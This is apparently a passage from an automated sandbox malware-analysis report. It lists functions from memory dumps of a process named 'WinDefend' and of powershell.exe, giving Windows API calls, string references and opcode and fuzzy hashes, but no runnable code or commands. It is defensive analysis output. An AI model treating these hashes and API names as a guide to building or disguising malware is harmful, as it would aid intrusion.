Instruction Fuzzy Hash: 95711674E12218DFDB08CFA5D640ADEBBF2EB89300F24946AD50ABB254DB319D52CF54

Function 0EDF0448 Relevance: 5.2, Strings: 4, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0EDF0692
xaq, xrefs: 0EDF05D7
xaq, xrefs: 0EDF057B
(aq, xrefs: 0EDF06BE

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID: (aq$(aq$xaq$xaq
API String ID: 0-3564754046
Opcode ID: 7a5e5108c2d94252ea3045b9a40a74af59b2bee3f9588e3e50285ba6bed3842c
Instruction ID: eb3f94f477997cc0eb7ec76f233f0c53c9422ba5e1f57ee5454c0eb03d171780
Opcode Fuzzy Hash: 7a5e5108c2d94252ea3045b9a40a74af59b2bee3f9588e3e50285ba6bed3842c
Instruction Fuzzy Hash: 1061BF317002059FDB15DF68C850BAE7BE2EF85314F158469E90A9B3A6CF76EC06CB90

Function 0EDF10CB Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

<H, xrefs: 0EDF0E64
4I, xrefs: 0EDF1170

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID: 4I$<H
API String ID: 0-3894381031
Opcode ID: 6f7af7525a3c9e7b76121511c8a1212beec1b1a3ee4b88328e72ced039af9bb1
Instruction ID: e2eaae8f359f82d591f0a60201154e0b1456dc6c887805a7788b424395e1e341
Opcode Fuzzy Hash: 6f7af7525a3c9e7b76121511c8a1212beec1b1a3ee4b88328e72ced039af9bb1
Instruction Fuzzy Hash: FEB1F574D02219CFDB64CF65D991ADEBBB2FB8A300F1091AAE549B7254DB309E81CF40

Function 0EDF1009 Relevance: 2.7, Strings: 2, Instructions: 220COMMON

Download Yara Rule

Strings

<H, xrefs: 0EDF0E64
4I, xrefs: 0EDF1170

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID: 4I$<H
API String ID: 0-3894381031
Opcode ID: 2695eb5566eba5c943a6a22eb76424468e9ad9a5851484e794232005e328beaf
Instruction ID: 21bf5db650c1e575f263659ece5b683a7eb6a547d6e71988641209ae93f4c684
Opcode Fuzzy Hash: 2695eb5566eba5c943a6a22eb76424468e9ad9a5851484e794232005e328beaf
Instruction Fuzzy Hash: C9B1F474D06219CFDB64CF65D990ADEBBB2FB8A300F1091AAD549B7254DB309E81CF40

Function 0113CF9C Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0113E849

Memory Dump Source

Source File: 0000001F.00000002.3282228465.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1130000_WinDefend.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c99af552f49bf7fe45500172935084cefd0c192c1c9275c4ed4837748910bae9
Instruction ID: 67c8aed1ba0bc905c761dd8b1a0b1c788075beb412b5fcebc4a4a5b5b05e9f40
Opcode Fuzzy Hash: c99af552f49bf7fe45500172935084cefd0c192c1c9275c4ed4837748910bae9
Instruction Fuzzy Hash: 2351E575D00218CFDB24DFA8C940B9EBBB5BF49300F1080AAD509AB255DB756A89CF91

Function 0B5AA890 Relevance: 1.6, APIs: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B5AA95B

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 30b44a1240df1731da41fad5de81d05cd08d24ceb1291a9d7d366697f62bb6af
Instruction ID: e32a322182c480f3185f566258b042c9d43b618054100790b7eac158d5346ef9
Opcode Fuzzy Hash: 30b44a1240df1731da41fad5de81d05cd08d24ceb1291a9d7d366697f62bb6af
Instruction Fuzzy Hash: E741CCB5C042589FCB11CFA9D884ADEFBF1BF4A310F14905AE854B7261C334A945CF65

Function 01132638 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 011326DF

Memory Dump Source

Source File: 0000001F.00000002.3282228465.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1130000_WinDefend.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: db6e125348c40f913c355629204d6300ece72b15625cdcc8aa49e786c3a11f7b
Instruction ID: 1ab556f9f876b7881898d252e02250c60aea96d40bf80cef1e97cad6e99f284c
Opcode Fuzzy Hash: db6e125348c40f913c355629204d6300ece72b15625cdcc8aa49e786c3a11f7b
Instruction Fuzzy Hash: CF31A9B8D002589FCB14CFA9D580ADEFBB1BF59310F14902AE818B7210C334A945CF64

Function 0B5A1E0C Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,?), ref: 0B5A5CB3

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0e8aabe64e97b953c739eb7e6e036cbc446e3c7721a0dea574b9a9ca64f2f67d
Instruction ID: c61508a584854a14d036cd0e357f901c591cfa2c474ec8580654f3ae178d24ab
Opcode Fuzzy Hash: 0e8aabe64e97b953c739eb7e6e036cbc446e3c7721a0dea574b9a9ca64f2f67d
Instruction Fuzzy Hash: B13187B9D04248AFCB10CFA9E584A9EFBF4FB59310F14906AE818B7310D335A945CFA4

Function 0B5A5C11 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,?), ref: 0B5A5CB3

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f916f9ecc3b77a755c1b48ac6c9065a18a39ef4c44fcec536baf3b1418dac7dc
Instruction ID: 56cc02199a04655f7e3b82002f317eff3df52d8cb1447795b3219f547d13acd2
Opcode Fuzzy Hash: f916f9ecc3b77a755c1b48ac6c9065a18a39ef4c44fcec536baf3b1418dac7dc
Instruction Fuzzy Hash: 743188B9D052489FCB10CFA9E584ADEFBF1BB59310F24906AE818B7310D335A945CF54

Function 0B5AA8C0 Relevance: 1.6, APIs: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B5AA95B

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a4b36029a7dd67ad8407310b9aa644296f3f1b07e7ef967c7e7f456fe8ac7b7e
Instruction ID: 0c65c1fdc6e8ecb1e969715a4ad41c369fc7f2265be759ba9c60e1e9e66ffc38
Opcode Fuzzy Hash: a4b36029a7dd67ad8407310b9aa644296f3f1b07e7ef967c7e7f456fe8ac7b7e
Instruction Fuzzy Hash: 263188B9D042589FCB10CFA9D584ADEFBF5BB59310F14905AE818B7310D339A945CF64

Function 0B5A6493 Relevance: 1.6, APIs: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0B5A6533

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d02d04346eb0b764b1053bb6c6abaa9cb486d92b40b450ce009542d64ab32d0e
Instruction ID: 2d61e484df30501ef9adbafac583f2b25d239008e9aef14f6c35b1c7ef426000
Opcode Fuzzy Hash: d02d04346eb0b764b1053bb6c6abaa9cb486d92b40b450ce009542d64ab32d0e
Instruction Fuzzy Hash: 743187B9D042489FCB10CFA9E584ADEFBF1BB59310F24905AE818B7310D335A945CF64

Function 0B5A42A8 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 0B5A434E

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: e86da9d2cf46f872a6f358814f73e77b180436aeaa9e997b5c7e13761b02cc7c
Instruction ID: 5c6ec95b201739c4c1e8b8c94aa12584a6c959681af401591b7b7e9a5b5a98ab
Opcode Fuzzy Hash: e86da9d2cf46f872a6f358814f73e77b180436aeaa9e997b5c7e13761b02cc7c
Instruction Fuzzy Hash: 9F31AAB5C012599FCB10CFA9D884AEEFBF5BB49310F14906AE458B7310D374AA85CB54

Function 0B5A6498 Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0B5A6533

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 09576bb59c6a822c76351eddeb16c6144b27ef65953866233ba7603fd3080310
Instruction ID: 3a461307030a8b2b47fc3ab7e28b90dfdd85d8bc988b0d3ace48bedb95ac4325
Opcode Fuzzy Hash: 09576bb59c6a822c76351eddeb16c6144b27ef65953866233ba7603fd3080310
Instruction Fuzzy Hash: 7A3178B9D042589FCB10CFA9E584ADEFBF5BB59310F14905AE818B7310D335A945CF64

Function 0B5A42B0 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 0B5A434E

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: ae1bc6e672563ac8cadc790753291f760da95a1c8a532c3224bf10396bfa8eb8
Instruction ID: f9e18c66851433c18283420c67f0ccc3a9270e04108b40ba2a9758b628bc8136
Opcode Fuzzy Hash: ae1bc6e672563ac8cadc790753291f760da95a1c8a532c3224bf10396bfa8eb8
Instruction Fuzzy Hash: 5A31B9B4C012189FCB10DFA9D884AEEFBF5BB49310F14806AE458B7310D374AA85CBA4

Function 0B5ACFE8 Relevance: 1.6, APIs: 1, Instructions: 74comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0B5AD065

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6b3c220d67563af985dc1c3047dc8599a475963c9a75834bbe96cf42d4e0fa14
Instruction ID: 2ac764069dfcf0ec9bf9a96ebda444fa56359a0ee5499d00addd3604fbc42cef
Opcode Fuzzy Hash: 6b3c220d67563af985dc1c3047dc8599a475963c9a75834bbe96cf42d4e0fa14
Instruction Fuzzy Hash: 0D31AAB4D012589FDB10DFA9E484ADEFBF5BB49310F10906AE814B7310D376A841CF64

Function 0B5AC8A0 Relevance: 1.6, APIs: 1, Instructions: 72comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0B5AD065

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0557038300bac5f0b3f9fea6183097d5098b5c4e31f11e5a46234574d1c12c27
Instruction ID: 9ef4bcbfc515895142baaafb0b5291e24488ef2e32e9c15ec3b87f0f52cf3a46
Opcode Fuzzy Hash: 0557038300bac5f0b3f9fea6183097d5098b5c4e31f11e5a46234574d1c12c27
Instruction Fuzzy Hash: 9B31CCB8D052589FDB10DFA9D984A9EFBF4FB49310F10946AE818B7310D775A841CFA4

Function 0B5AC94C Relevance: 1.6, APIs: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 0B5AE193

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 3dfff1abd35ce7e6668e2038b72161ffc05ee3652b5dfa5d420e2491b98249f7
Instruction ID: db29ccfe00ad4a4c6f435d798d0020e609f1442886f3908ea2d8da4722c914a6
Opcode Fuzzy Hash: 3dfff1abd35ce7e6668e2038b72161ffc05ee3652b5dfa5d420e2491b98249f7
Instruction Fuzzy Hash: D931A8B8D042189FDB10CFA9D485ADEFBF4AB49320F24906AE818B7310D334A941CFA4

Function 0B5AE110 Relevance: 1.6, APIs: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 0B5AE193

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: cc1376383b759c7e09e4d01834753b0908586c5d8ab001bdfeaa463bb621983a
Instruction ID: a30f54e0cfee9abdc5b277a7e66e08618ba8aa83ff3114f926dc7197ffa00c63
Opcode Fuzzy Hash: cc1376383b759c7e09e4d01834753b0908586c5d8ab001bdfeaa463bb621983a
Instruction Fuzzy Hash: 5C319CB8D002199FDB10CFA9D585ADEFBF5AB49324F24905AE418B7310D335A941CFA5

Function 0EDF043D Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

xaq, xrefs: 0EDF057B

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID: xaq
API String ID: 0-793007810
Opcode ID: 66456867172692056561581954863c6ca41f90a78973ddd18e7dd2ebc538fb5e
Instruction ID: ae9fb8c38e2e03fdb57b2518033d2f1eb271db5f1b3d308f76800ea96e1fe9de
Opcode Fuzzy Hash: 66456867172692056561581954863c6ca41f90a78973ddd18e7dd2ebc538fb5e
Instruction Fuzzy Hash: D6419E307002059FDB15DF68C854BAE77E2EF84314F15846CE91A9B3A6CB76EC46CB81

Function 0EDF1939 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce679dd5518e00d3c8b0f80f163cecf64e37ce7bdaaf87e4aad51f035d78c58
Instruction ID: eece39d6ba4ef6d30903d82e7a22be88b0dcf97ffcbd932168dc8d0660497b76
Opcode Fuzzy Hash: cce679dd5518e00d3c8b0f80f163cecf64e37ce7bdaaf87e4aad51f035d78c58
Instruction Fuzzy Hash: 0C31C574E16218CFCB04DFA5D5809ADBBB2FB89301F50902AD51ABB358DB309D51CF44

Function 00EBD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3277839140.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_ebd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b91f11337844a59d62370c135289ef7fc5127645b641543dcc1dbb5ec6fd00d
Instruction ID: e0c1715714a1669a721d0614f16c0a1258c84d5792c0e8e8c3c60e68a0269516
Opcode Fuzzy Hash: 2b91f11337844a59d62370c135289ef7fc5127645b641543dcc1dbb5ec6fd00d
Instruction Fuzzy Hash: D6213071508200DFCB25DF14D9C0FA7BF65FB98328F20C569E9092B256D33AD816CAA2

Function 00ECD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3278926764.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_ecd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f617dbd9b686987c32dadf576f5c3b225c7dee8d29dabd589c9c5505a6ac9cb5
Instruction ID: 3048a0744e5a1b2a104e770d1b599439e8876e8a2c47d6a8dceddb129614ffe1
Opcode Fuzzy Hash: f617dbd9b686987c32dadf576f5c3b225c7dee8d29dabd589c9c5505a6ac9cb5
Instruction Fuzzy Hash: 4D21D371508204DFCB15DF28DA85F16BB66FB84314F20C57DD94A5B296C33BD807CA61

Function 00ECD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3278926764.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_ecd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd36cfbb2b28be64677358d1a1627bd6b9d302b3d76ef57fbea2eed7fd5a643a
Instruction ID: 0d51a1fdda9560b5ea4288beeb853e1ae8537131c2e1834a0a51c726298be08c
Opcode Fuzzy Hash: cd36cfbb2b28be64677358d1a1627bd6b9d302b3d76ef57fbea2eed7fd5a643a
Instruction Fuzzy Hash: 842141755093809FD712CF24D994B15BF71EB46214F28C5EAD8498B6A7C33B980BCB62

Function 00EBD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3277839140.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_ebd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: ac58690e9d64759f10eb57f3df0d3cd5b484eb8b0cf61ea409a646d6ac2c5aaa
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: A6112672404280CFCB12CF10D9C4B56BF71FB98328F24C6A9D9490B256C33AD85ACBA2

Function 00EBD889 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3277839140.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_ebd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59dc95d9c88a154a7ef46d9018b45cdfa096b153df8f77a26b596eaab923cfea
Instruction ID: 107bec90bf5af16296ab91c9ad08e65eef80d0aa39ba35ced6b7c8a5e9ed8208
Opcode Fuzzy Hash: 59dc95d9c88a154a7ef46d9018b45cdfa096b153df8f77a26b596eaab923cfea
Instruction Fuzzy Hash: 1F012B3100D340DAE7249E19DD84BE7FF9CEF45325F18C42AED092A286D3799840DAB1

Function 00EBD888 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3277839140.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_ebd000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c372be7a68d0a82867c3c5fad3b01c2c9f8a9b9e9f0460a5e2e86eee84980a35
Instruction ID: 55cec40ebaccf41ecb503b1606583187ce2b6ae03f924d575a4e4ace58f312f3
Opcode Fuzzy Hash: c372be7a68d0a82867c3c5fad3b01c2c9f8a9b9e9f0460a5e2e86eee84980a35
Instruction Fuzzy Hash: E9F0C2714083449AE7248E0ADC84BA3FFACEF51335F18C45AED485A286C3799840CAB0

Function 0EDF06F0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15eda8aec8ff9893e275ef46afa8187707ecbef8eef2dd0331d65c683c61b3f5
Instruction ID: 7cb843a8e33ef75bdb24745cd0fb29927634bcb32c768e889ab1d9e436bb19bb
Opcode Fuzzy Hash: 15eda8aec8ff9893e275ef46afa8187707ecbef8eef2dd0331d65c683c61b3f5
Instruction Fuzzy Hash: 43E06132309280EBC321464B9C04D777BA9DBC6320F454096F7C5C3517D611FC01C791

Function 0EDF1620 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58107edbf4a41c726b6c3e8ebdd1379bc620107a85ee971233693ede9d17d649
Instruction ID: abf72e8127dfab0845afff39a27f868f692214d6f9dec271876c490a778fcc7e
Opcode Fuzzy Hash: 58107edbf4a41c726b6c3e8ebdd1379bc620107a85ee971233693ede9d17d649
Instruction Fuzzy Hash: AFF02B751142959FC715DB6CD446B9D7FB0EF83320F0002DAD4549B2E3CB316486CB52

Function 0EDF1AB0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0217cfb9329976ae704372069b7b77189558db0a0e092521a16657bda1761597
Instruction ID: e8b303165269977819dece6560dd22617af1b316cbd1f0512a0c58cdbf30a257
Opcode Fuzzy Hash: 0217cfb9329976ae704372069b7b77189558db0a0e092521a16657bda1761597
Instruction Fuzzy Hash: DDE06D70D45244AECB15DFB8E841589BFB0BB46300F4082AAD018A3256D7344A56CB41

Analysis Process: powershell.exePID: 4476, Parent PID: 640COMMON

Executed Functions

Function 00007FF848FE87E7 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.3088248509.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fca435b02a8f763b0e5dc9090a323c89e0774c6f76a7c5440fc074f187a48d9
Instruction ID: c5584b87ff5ef822ed0182946429459a112d4ad48c87fd9faf7ffc0276adbf6b
Opcode Fuzzy Hash: 1fca435b02a8f763b0e5dc9090a323c89e0774c6f76a7c5440fc074f187a48d9
Instruction Fuzzy Hash: 9EE13431D2EA8A5FE7A6BB6858245B57BE0EF56790F4800FAD04CCB0D3DB1C9805C356

Function 00007FF848FE87FE Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.3088248509.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 683e245a1949d63a353994abec8cb3dc2ed663d2177973a6e07a7e4bd631c200
Instruction ID: c727078a9d7569217de9255dcb282b1bbb33d53d4e055eeceeb6bd37a14ea6ed
Opcode Fuzzy Hash: 683e245a1949d63a353994abec8cb3dc2ed663d2177973a6e07a7e4bd631c200
Instruction Fuzzy Hash: ABB1DF31D2EBC65FE7A3BB6848641757FE0AF52650F4900FAD048CB0D3DA1C9809C356

Function 00007FF848FE3D7E Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.3088248509.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 535a82694240dba0ab9aca6003766bfc270a2ae40f1eeac666ecf92b5f541632
Instruction ID: f496da3dabdf657b4502923252d5dab8c930bb603ecd97ab02d19f588e552c3a
Opcode Fuzzy Hash: 535a82694240dba0ab9aca6003766bfc270a2ae40f1eeac666ecf92b5f541632
Instruction Fuzzy Hash: 8651E27180D7C89FD7669B2898596A47FF0EF97321F0942EFD088C7193CB289846C796

Function 00007FF848FE51EC Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.3088248509.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb3810b193981e11dd503d56653fcfbdbce7e4e8973db729f325930bf359911
Instruction ID: 7a7eb74665dd5c50af5e5bb4dd5fcd7bd50f2375c67c4a9571246090598d34f7
Opcode Fuzzy Hash: efb3810b193981e11dd503d56653fcfbdbce7e4e8973db729f325930bf359911
Instruction Fuzzy Hash: 39510631A0EAC54FEB96EB2858546B57BF1EF5A350F0801FBD448CB0D3DA18AC09C766

Function 00007FF848FE5B74 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.3088248509.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff848fe0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7706798e0c4bb82232e109b68ea913dff824f67c5b9bcc98f982877395ce8f20
Instruction ID: 1da9356317a64abf65ea73c7002e84cf07ba039ccf8f7e7fd4c57ee7f0afb139
Opcode Fuzzy Hash: 7706798e0c4bb82232e109b68ea913dff824f67c5b9bcc98f982877395ce8f20
Instruction Fuzzy Hash: B301AD21E0FA861FE398B72C28992B86AD0EF59791F0800BED05DD71D3ED0C2C494366

Function 00007FF848F13605 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.3082064079.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ff848f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
